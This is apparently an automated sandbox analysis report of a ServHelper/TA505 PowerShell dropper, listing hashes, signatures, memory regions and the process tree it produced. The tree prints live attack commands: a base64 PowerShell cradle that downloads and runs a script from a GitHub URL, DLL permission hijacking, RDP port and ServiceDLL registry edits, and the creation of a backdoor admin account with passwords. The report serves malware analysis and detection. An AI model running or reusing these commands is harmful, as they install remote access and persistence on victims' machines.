Analysis

  • max time kernel
    132s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    08-02-2022 02:28

General

  • Target

    b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1

  • Size

    3.8MB

  • MD5

    213d018805394eb6e12f57005f1d45e0

  • SHA1

    b01887dc649cb1209abdad8ce9ea59ec33d1c6b2

  • SHA256

    b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5

  • SHA512

    c0334c5e90c3e5edd09c9ac7a7c5792bcdf43b4fd9362e5c573d6f0729d5c71db611967a9d5c417d430575a951e6270d7049879711db1a38598a2f16d486233c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1
    1⤵
    • Deletes itself
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1444
    • C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1600
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1592
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1620
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:560
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:432
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1344
    • C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1148
    • C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      2⤵
        PID:644
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        2⤵
        • Modifies registry key
        PID:1824
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        2⤵
          PID:1780
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            3⤵
              PID:1528
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1488
            • C:\Windows\system32\cmd.exe
              cmd /c net start rdpdr
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1680
              • C:\Windows\system32\net.exe
                net start rdpdr
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1728
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1768
            • C:\Windows\system32\cmd.exe
              cmd /c net start TermService
              3⤵
                PID:1904
                • C:\Windows\system32\net.exe
                  net start TermService
                  4⤵
                    PID:1136
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start TermService
                      5⤵
                        PID:1532
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                  2⤵
                    PID:1480
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                    2⤵
                      PID:1716
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 start rdpdr
                    1⤵
                      PID:1720
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc Ghar4f5 /del
                      1⤵
                        PID:108
                        • C:\Windows\system32\net.exe
                          net.exe user wgautilacc Ghar4f5 /del
                          2⤵
                            PID:1208
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                              3⤵
                                PID:956
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe user wgautilacc h7PvZbL8 /add
                            1⤵
                              PID:1672
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc h7PvZbL8 /add
                                2⤵
                                  PID:908
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user wgautilacc h7PvZbL8 /add
                                    3⤵
                                      PID:1912
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                  1⤵
                                    PID:1696
                                    • C:\Windows\system32\net.exe
                                      net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                      2⤵
                                        PID:884
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                          3⤵
                                            PID:1564
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
                                        1⤵
                                          PID:560
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
                                            2⤵
                                              PID:1344
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
                                                3⤵
                                                  PID:728
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                              1⤵
                                                PID:644
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                  2⤵
                                                    PID:1292
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                      3⤵
                                                        PID:1192
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe user wgautilacc h7PvZbL8
                                                    1⤵
                                                      PID:992
                                                      • C:\Windows\system32\net.exe
                                                        net.exe user wgautilacc h7PvZbL8
                                                        2⤵
                                                          PID:1724
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 user wgautilacc h7PvZbL8
                                                            3⤵
                                                              PID:1704
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd.exe /C wmic path win32_VideoController get name
                                                          1⤵
                                                            PID:1456
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1120
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd.exe /C wmic CPU get NAME
                                                            1⤵
                                                              PID:552
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic CPU get NAME
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1592
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                              1⤵
                                                                PID:688
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                  2⤵
                                                                    PID:728
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      3⤵
                                                                      • Blocklisted process makes network request
                                                                      • Drops file in Windows directory
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1632

                                                                Network

                                                                MITRE ATT&CK Enterprise v6

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  MD5

                                                                  9a4151c650657a6f14ab6c21baeaff57

                                                                  SHA1

                                                                  4ecb724d1a61204cfe482de6b678a717d9c2efc2

                                                                  SHA256

                                                                  20e1835da4929d8ca17485af73af6fdec6a5108abb9121c6ff4da0bccc58fe54

                                                                  SHA512

                                                                  f980460afa7b12679a2f717f720cd7cf6f4f693c3eada0f8e079d1c3d23e7a4c7036e4384c0518f732f91ed892d99f54cb9620c48574d1d176a2b037230b029b

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  MD5

                                                                  9a4151c650657a6f14ab6c21baeaff57

                                                                  SHA1

                                                                  4ecb724d1a61204cfe482de6b678a717d9c2efc2

                                                                  SHA256

                                                                  20e1835da4929d8ca17485af73af6fdec6a5108abb9121c6ff4da0bccc58fe54

                                                                  SHA512

                                                                  f980460afa7b12679a2f717f720cd7cf6f4f693c3eada0f8e079d1c3d23e7a4c7036e4384c0518f732f91ed892d99f54cb9620c48574d1d176a2b037230b029b

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  MD5

                                                                  9a4151c650657a6f14ab6c21baeaff57

                                                                  SHA1

                                                                  4ecb724d1a61204cfe482de6b678a717d9c2efc2

                                                                  SHA256

                                                                  20e1835da4929d8ca17485af73af6fdec6a5108abb9121c6ff4da0bccc58fe54

                                                                  SHA512

                                                                  f980460afa7b12679a2f717f720cd7cf6f4f693c3eada0f8e079d1c3d23e7a4c7036e4384c0518f732f91ed892d99f54cb9620c48574d1d176a2b037230b029b

                                                                • C:\Windows\system32\rfxvmt.dll

                                                                  MD5

                                                                  dc39d23e4c0e681fad7a3e1342a2843c

                                                                  SHA1

                                                                  58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                  SHA256

                                                                  6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                  SHA512

                                                                  5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                • \??\PIPE\lsarpc

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \??\PIPE\samr

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \??\PIPE\samr

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \??\PIPE\samr

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \??\PIPE\samr

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \Windows\Branding\mediasrv.png

                                                                  MD5

                                                                  e2efb03e5ad345dc20f2619bc6c4aac1

                                                                  SHA1

                                                                  005f23c4d1846dd5b7a90d00286b33e3fc70ffa0

                                                                  SHA256

                                                                  278dc8c69a9fc030a7f5dbd932778c1e520c9d73fdef59426b518059ad0580b7

                                                                  SHA512

                                                                  111976af2680f0c5f650a9bc2221baf24d5b0abb55200b2feb85d7d416289ae147e4ddae9f08b09745af9cf0115619955f5d3d165757f4fbaaafcda9ebdecb30

                                                                • \Windows\Branding\mediasvc.png

                                                                  MD5

                                                                  63d2e146cd2334d6c5f7dafab981ef04

                                                                  SHA1

                                                                  bf329e34b07390dabf3e7f8d8d62ac5e7136d4e9

                                                                  SHA256

                                                                  976550af2f2ec3e87f4fb9897975959b6af101abea6c7ca4768569eb614fb78d

                                                                  SHA512

                                                                  e1dde8623b0c7acc71aa5b8645fa543fa989375ebd863bfc091c42ed9523f4d8177cf1d77ba0c3b939ece661e667e8b434cfd9fa54e741311a65605b6e868400

                                                                • memory/620-69-0x0000000002710000-0x0000000002712000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/620-65-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/620-68-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/620-71-0x0000000002712000-0x0000000002714000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/620-70-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/620-72-0x0000000002714000-0x0000000002717000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/620-73-0x000000001B930000-0x000000001BC2F000-memory.dmp

                                                                  Filesize

                                                                  3.0MB

                                                                • memory/620-74-0x000000000271C000-0x000000000273B000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/620-67-0x0000000002717000-0x0000000002718000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/620-66-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/960-57-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/960-59-0x00000000024C0000-0x00000000024C2000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/960-60-0x00000000024C2000-0x00000000024C4000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/960-61-0x00000000024C4000-0x00000000024C7000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/960-56-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/960-62-0x00000000024CB000-0x00000000024EA000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/960-58-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/960-55-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1444-91-0x000000001B7E0000-0x000000001BADF000-memory.dmp

                                                                  Filesize

                                                                  3.0MB

                                                                • memory/1444-96-0x0000000001CE0000-0x0000000002160000-memory.dmp

                                                                  Filesize

                                                                  4.5MB

                                                                • memory/1444-89-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1444-88-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1444-90-0x0000000001CE0000-0x0000000002160000-memory.dmp

                                                                  Filesize

                                                                  4.5MB

                                                                • memory/1444-92-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1444-93-0x0000000001CE0000-0x0000000002160000-memory.dmp

                                                                  Filesize

                                                                  4.5MB

                                                                • memory/1444-94-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1444-95-0x0000000001CE0000-0x0000000002160000-memory.dmp

                                                                  Filesize

                                                                  4.5MB

                                                                • memory/1632-107-0x000007FEF4FE0000-0x000007FEF597D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1632-110-0x00000000011E0000-0x00000000011E2000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1632-111-0x000007FEF4FE0000-0x000007FEF597D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1632-113-0x00000000011E4000-0x00000000011E7000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/1632-112-0x00000000011E2000-0x00000000011E4000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1632-109-0x00000000011EB000-0x000000000120A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1632-108-0x000007FEF4FE0000-0x000007FEF597D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1632-106-0x000007FEF2B70000-0x000007FEF36CD000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1648-77-0x000007FEF3510000-0x000007FEF406D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1648-78-0x000000001B940000-0x000000001BC3F000-memory.dmp

                                                                  Filesize

                                                                  3.0MB

                                                                • memory/1648-84-0x00000000027E2000-0x00000000027E4000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1648-79-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1648-80-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB

                                                                • memory/1648-85-0x00000000027E4000-0x00000000027E7000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/1648-82-0x00000000027E0000-0x00000000027E2000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1648-81-0x00000000027EC000-0x000000000280B000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1648-83-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

                                                                  Filesize

                                                                  9.6MB